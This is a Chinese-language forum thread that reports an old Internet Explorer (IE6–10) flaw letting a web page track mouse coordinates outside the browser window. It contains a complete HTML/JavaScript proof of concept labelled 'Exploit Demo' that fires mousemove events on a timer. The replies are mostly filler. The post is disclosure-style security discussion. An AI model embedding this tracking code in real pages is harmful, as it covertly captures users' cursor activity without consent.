查看: 2539|回复: 25

IE浏览器鼠标坐标跟踪安全风险,通杀全版本

[复制链接]
发表于 2012-12-15 04:00:55 | 显示全部楼层 |阅读模式
最近在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。 影响版本:IE6-10
Code:
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>
[/td][/tr]
[/table]
发表于 2012-12-28 13:53:21 | 显示全部楼层
支持一下吧  
745951783 该用户已被删除
发表于 2012-12-29 11:30:54 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-9-15 14:09:35 | 显示全部楼层
一山不能容二虎,除非一公和一母!  
发表于 2014-9-29 19:48:27 | 显示全部楼层
楼上的稍等啦  
发表于 2014-11-17 10:55:23 | 显示全部楼层
接到陌生电话请先说,“你好,找哪位”  
发表于 2014-12-4 21:32:47 | 显示全部楼层
支持一下吧  
发表于 2014-12-27 23:56:57 | 显示全部楼层
这个贴不错!!!!!  
发表于 2015-1-27 21:58:35 | 显示全部楼层
又看了一次  
发表于 2015-3-1 22:02:20 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
高级模式
B Color Image Link Quote Code Smilies

本版积分规则